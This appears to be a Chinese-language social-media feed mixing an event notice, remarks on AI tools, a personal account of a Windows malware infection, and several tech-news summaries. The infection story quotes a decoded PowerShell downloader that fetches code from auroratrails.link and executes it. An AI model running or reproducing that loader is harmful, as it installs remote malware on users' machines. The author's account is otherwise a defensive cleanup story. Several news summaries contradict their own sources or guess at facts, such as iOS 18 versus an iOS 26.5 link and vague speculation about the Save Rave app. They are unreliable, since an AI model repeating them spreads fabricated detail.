邀請所有朋友來參加 WeHelp Demo Day 第七屆的專案技術分享會。

5/17 週日晚上，8 點鐘，線上直播網址
https://youtube.com/live/OqcxlklFYto

了解學員們如何從無到有，成為具備良好基礎，能掌握雲端系統維運能力，開發 AI 應用的軟體工程師，詳細的活動和專案介紹，請參考以下活動網頁：
https://wehelp.tw/academy/demo-day

怎麼用好 AI？
現在各種新流派出來真的不需要 FOMO
也不用什麼都會
目前我看起來都在做一樣的事情
也就是

『邊界控制』

只是方法和流程有差別
所以找到屬於自己當下該專案要的方法就好
不要被那些新名詞嚇到

最近忽然發現我的老桌機（Windows 11）有很奇怪的狀況
來流水帳一下...

上禮拜周末 2026/5/2~5/3
忽然不能上網，但 LINE 還可以用，和 AI 問半天也跑很多指令，最後沒轍 Windows Update 給我直接壞掉，就去下載 ISO 黨來修復就好了。
大致原因是，原來 Windows 也有 SSL 的設定但壞掉了，所以需要經過這段的就全部不能上網，但 LINE Desktop 有繞過 XDD
大概總結來說是 Windows 網路設定、Proxy、DNS 或 HTTPS/TLS 層的問題。
其他太深就不說了，我其實也不懂，只是跟著 AI 的建議一步一步排除。
比較有印象的是開 CMD 做以下測試
1. ping 8.8.8.8 和 google.com 都正常
2. curl -I https://www.google.com 會失敗 time out

昨天 2026/5/10 忽然發現 Google 的服務出問題...
新的網站用 Google Oauth 註冊就會轉不停無法成功。但瀏覽器多數已經 Google 登入的運作正常，比如 Youtube，除了 Gmail 和 Calendar 也是轉不停。
所以又開始和 AI 諮詢了...
處理過程跟上週很類似，弄一弄重製一些網路設定又變跟上周一樣了（哭）。
不能上網，但 LINE 還可以用 XDD
然後發現「Windows 使用者層級 Proxy 被開啟」，因為流量被導到 127.0.0.1:58045，所以上網就出問題。
是以下 process 開啟這各 Proxy：
"C:\WINDOWS\system32\OneDriveVersionAgentV12Task-5xv15a\node.exe" .\app.js
名字看起來有鬼...把他強制砍掉後又自動出現一個新的一樣的 process。
往上再追發現有一個 parent process：
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" -NoProfile -EncodedCommand ...
Base64 解碼後，內容是：
" b9b37fe2-e450-4639-ba41-653772270f72
Invoke-WebRequest -UseBasicParsing auroratrails.link | Invoke-Expression
AI 說是「從 auroratrails.link 下載 PowerShell 程式碼，並直接執行」，這是典型的惡意 downloader / loader 行為。

哇～還滿酷的...XD

後來斷網把他們都砍光光，包含相關資料夾。
再清除 Windows Proxy，然後再用 Windows Defender 離線掃描。
後來還發現這兩天覺得為什麼 Gmail 都收不到信，發現我 Gmail 篩選器設定竟然有信件進來就自動被移到垃圾桶的設定，不知道和那個惡意程式有沒有關係...
總之雖然解決而且都是我不懂的東西，但還是很有收穫：
1. 感謝 AI。
2. CMD 一堆指令酷酷的，看久了好像也學了點東西，感覺很底層，這次就全部把它筆記下來了。
3. 惡意軟體想想還挺恐怖的，還好沒發生什麼金錢損失的事情，要多觀察幾天。
4. Mac OS 是不是真的比較安全？XD
5. 從小玩遊戲到現在快 30 年了，現在才碰到惡意軟體發作也滿幸運的？

附圖是確認「Windows 使用者層級 Proxy」是否關閉的指令，0x0 就是關閉。

我覺得... claude 肯定對 gpt 有很大的偏見
我請他修個 UI ，不管用 Sonnet 還是 Opus 修好幾次都沒搞定
直到我跟他說... 還是我請 GPT 5.5 來幫忙？
他就修好了... 笑死
我真的要去訂閱 GPT ，然後讓他們互相競爭，誰能處理就是誰處理

蘋果 AirPods Max 2 對比森海塞爾 HDB 630 對比索尼 WH-1000XM6
Apple AirPods Max 2 vs Sennheiser HDB 630 vs Sony WH-1000XM6 comparison
Source: https://www.gsmarena.com/apple_airpods_max_2_vs_sennheiser_hdb_630_vs_sony_wh1000xm6_comparison-news-72752.php

目前高階無線降噪耳機市場正迎來新一輪的旗艦對決。隨著 Apple AirPods Max 2、Sony WH-1000XM6 以及 Sennheiser 傳聞中的新一代產品（如 HDB 630 相關型號）的規格比較與預測陸續流出，市場正高度關注這三大巨頭如何在外觀設計、主動降噪技術（ANC）及音質表現上進行突破。這場競爭不僅是硬體規格的較量，更是各家品牌在軟體生態系整合與使用者體驗上的深度博弈。


歷史背景：
回顧過去數年，Sony 憑藉 WH-1000X 系列在主動降噪市場長期佔據領導地位，並以技術更新快速著稱；Apple 則在 2020 年推出 AirPods Max，成功以高單價精品定位與強大的 Apple 生態系聯動切入市場。與此同時，傳統聲學大廠 Sennheiser 在經歷消費性產品部門轉手後，持續強化其在無線發燒音質領域的競爭力。這三大品牌在過去五年中，共同推動了藍牙耳機從單純的「便利性工具」轉向「兼具高保真音質與強效降噪」的產業轉型。


未來這類旗艦耳機的競爭將聚焦於空間音訊的精準度、無損藍牙傳輸協定（如更普及的 LC3 或 LDAC 優化）以及更長效的電池續航力。隨著 AI 技術的介入，自適應降噪與個人化調音將變得更加自動化與智慧化。此外，這場頂尖對決可能會進一步推高消費級耳機的價格天花板，同時促使舊款旗艦機型降價，進而加速高階降噪技術在主流市場的普及化，改變大眾對無線音訊品質的期待。

伊利亞·蘇茨克維爾作證稱其持有價值70億美元的OpenAI股份——馬斯克-奧特曼案中第二位新晉億萬富翁曝光
Ilya Sutskever Testifies He Holds $7 Billion OpenAI Stake—Second New Billionaire Revealed In Musk-Altman Trial
Source: https://www.forbes.com/sites/aliciapark/2026/05/11/ilya-sutskever-testifies-he-holds-7-billion-openai-stake-second-new-billionaire-revealed-in-musk-altman-trial/

在伊隆·馬斯克（Elon Musk）與 OpenAI 及其執行長山姆·奧特曼（Sam Altman）的法律訴訟中，OpenAI 前首席科學家伊利亞·蘇茨克維（Ilya Sutskever）在證詞中透露，他持有該公司價值約 70 億美元的股份。這項披露使他成為該訴訟過程中繼奧特曼之後，第二位被揭露身價達到億萬富翁等級的創始成員。這項消息不僅證實了 OpenAI 巨大的市場估值，也讓這家最初以非營利為宗旨的公司，其內部的利益分配成為法庭辯論與公眾關注的焦點。


OpenAI 於 2015 年由馬斯克、奧特曼、蘇茨克維等人共同創立，最初定位為非營利研究機構，旨在開發安全且造福全人類的通用人工智慧（AGI）。然而，為了獲取龐大的運算資源與資金，公司在 2019 年轉型為「利潤上限」模式，並開始接受微軟的大規模投資。馬斯克隨後於 2024 年提起訴訟，指控奧特曼與 OpenAI 背棄了最初的非營利使命，轉而追求商業利益。蘇茨克維曾於 2023 年 11 月參與罷免奧特曼的行動，隨後表達遺憾並最終於 2024 年離開公司創立新事業，其在該案中的證詞對於釐清公司轉型過程中的決策與利益分配至關重要。


這項高額持股的曝光可能對 OpenAI 的法律防禦造成衝擊，特別是關於其是否仍維持非營利初衷的爭議，這可能成為馬斯克方指控其「背信」的重要論據。未來，監管機構與稅務部門可能會加強對非營利組織轉型為營利實體過程的審查，以防止公共資源或稅收優惠被轉化為私人巨額財富。此外，隨著 AI 產業核心人物的財富透明化，社會對於 AI 技術資源過度集中於少數個人手中的擔憂將進一步加劇，可能引發更多關於 AI 治理與利益分配公平性的政策討論。

「拯救銳舞」：這款熱門但備受爭議的應用程式將蘋果告上法庭，要求重返App Store。
"Save Rave": popular, but controversial app takes Apple to court, wants back on the App Store
Source: https://www.phonearena.com/news/popular-but-controversial-app-takes-apple-to-court-wants-back-on-the-app-store_id180274

備受爭議但極受歡迎的應用程式「Save Rave」正式向蘋果公司（Apple）提起訴訟，要求重返 App Store。該應用程式此前因違反平台政策而被下架，目前雙方已進入法律程序，Save Rave 試圖透過法院裁決恢復其在 iOS 平台上的營運地位。

「Save Rave」最初因其獨特的功能（通常涉及社交互動或媒體內容處理）在年輕用戶群中迅速走紅。然而，隨著知名度提升，該程式也因涉及版權爭議、數據隱私或內容審核機制不全而遭到監管機構與蘋果的關注。在多次警告無效後，蘋果以違反開發者準則為由，將其從全球 App Store 撤下，引發了開發者與平台方之間關於「壟斷」與「審查標準」的長期爭論。

此案的結果可能對行動應用生態系產生深遠影響。若 Save Rave 勝訴，將挑戰蘋果對 App Store 的絕對控制權，並為其他被下架的應用程式開啟回歸先例；反之，若蘋果獲勝，則進一步鞏固了其「圍牆花園」政策的合法性。此外，這場訴訟也可能促使各國監管機構加速推動針對數位市場公平競爭的相關立法，改變未來開發者與科技巨頭之間的權力平衡。

蘋果將加密的RCS聊天功能引入iPhone
Apple brings encrypted RCS chats to iPhone
Source: https://www.theverge.com/tech/928141/apple-ios-26-5-rcs-messages-iphone-google-android

蘋果正式在 iOS 18 中導入了 RCS（富通訊服務）標準，這意味著 iPhone 使用者在與 Android 使用者傳送訊息時，不再僅限於過時的 SMS 或 MMS。此更新支援了端到端加密（透過更新後的標準）、高解析度照片與影片傳輸、已讀標籤以及即時打字狀態，大幅提升了跨平台通訊的安全性和體驗。


多年來，蘋果一直將 iMessage 視為其生態系統的「護城河」，拒絕支援由 Google 和電信商推動的 RCS 標準，導致跨平台通訊體驗長期不佳（如綠色對話框、低畫質影像）。然而，隨著歐盟《數位市場法案》（DMA）的監管壓力增加，加上 Google 持續透過行銷活動公開施壓，蘋果最終在 2023 年底宣布妥協，承諾將 RCS 納入其系統，以改善不同裝置間的互操作性。


這一轉變將顯著降低 iPhone 與 Android 用戶之間的溝通隔閡，並提高全球行動通訊的基礎安全標準。雖然 iMessage 仍會保留其獨家功能以維持品牌差異化，但 RCS 的普及可能會削弱「藍色對話框」帶來的社交壓力。未來，隨著更多電信商支援，傳統簡訊可能逐漸淡出市場，由更安全、功能更豐富的加密 RCS 全面取代。

谷歌阻止了一起零時差攻擊，據稱該攻擊是由人工智慧開發的。
Google stopped a zero-day hack that it says was developed with AI
Source: https://www.theverge.com/tech/928007/google-ai-zero-day-exploit-stopped

Google 最近攔截了一起針對 Android 系統的零日漏洞（Zero-day）攻擊，並指出該攻擊代碼是由人工智慧（AI）協助開發的。這項漏洞（CVE-2024-43047）主要影響高通（Qualcomm）晶片組。Google 的威脅分析小組（TAG）發現，攻擊者利用大型語言模型（LLM）來編寫或優化漏洞利用程式碼，這標誌著 AI 技術已正式進入實戰層面的網路攻擊，而非僅止於實驗室階段。

過去，零日漏洞的發現與開發通常需要具備極高技術門檻的人類研究員，且開發週期漫長。Google 威脅分析小組長期追蹤受國家資助的駭客組織，發現這些組織近年來開始嘗試將自動化工具融入攻擊流程。隨著生成式 AI 技術的爆發，資安界一直爭論 AI 是否能產出可運行的惡意代碼。此次事件證實了 AI 輔助開發的漏洞利用程式已開始在現實世界中被部署，代表駭客工具的演進進入了新階段。

未來網路攻擊的頻率與複雜度將大幅提升，因為 AI 降低了開發漏洞利用程式的技術門檻，使更多攻擊者能發動高階攻擊。這將導致一場「網路軍備競賽」，防禦方必須同樣依賴 AI 進行即時監測與自動化修補，才能應對 AI 生成且快速變異的威脅。此外，針對特定目標的客製化攻擊將變得更廉價且高效，企業與政府需重新評估其資安架構，以因應這種由 AI 驅動的自動化攻擊新常態。

Gemma 4 與 Gemini 3.1：哪一款 Google AI 比較適合你？
Gemma 4 vs Gemini 3.1 : Which Google AI is Right for You?
Source: https://www.geeky-gadgets.com/gemma-4-vs-gemini-3-1/

Google 目前正採取雙軌並行的 AI 發展策略，將其產品線劃分為封閉式的旗艦模型 Gemini 與開放權重的輕量化模型 Gemma。Gemini 3.1 定位為具備強大雲端運算能力、處理極大規模多模態任務的頂尖模型，適合追求極致性能與整合服務的企業或個人；而 Gemma 4 則專為開發者與研究人員設計，強調可在本地端設備運行，並提供高度自定義的靈活性與隱私保障。用戶的選擇關鍵在於任務的複雜度、對運算成本的考量，以及是否需要對模型進行底層微調。

這場技術演進源於 Google 在生成式 AI 浪潮中的戰略轉型。最初 Google 推出 Bard 以應對市場競爭，隨後將其更名並升級為 Gemini 品牌，確立了以大語言模型為核心的生態系統。為了與 Meta 的 Llama 等開源勢力抗衡，Google 隨後推出了源自 Gemini 技術但規模較小的 Gemma 系列，打破了過往僅提供 API 服務的封閉形象。從 Gemini 早期版本到現在的 3.1，以及 Gemma 系列的持續迭代，反映了 Google 試圖在「專有商業技術」與「開源社群生態」之間取得平衡，以鞏固其在人工智慧領域的領導地位。

未來，這種雙軌制將推動「混合 AI」架構的普及，基礎的指令處理與隱私敏感任務將由 Gemma 4 在個人裝置（如手機、筆電）上完成，而涉及海量數據分析與深度邏輯推理的運算則交由雲端的 Gemini 3.1 處理。這不僅會加速邊緣運算的技術突破，也可能促使 AI 開發成本進一步降低。隨著這兩大系列的不斷演進，Google 有望建立一個涵蓋從個人開發者到跨國企業的完整 AI 基礎設施，進而定義下一代運算平台的標準，並在開源與閉源的競爭對抗中佔據關鍵優勢。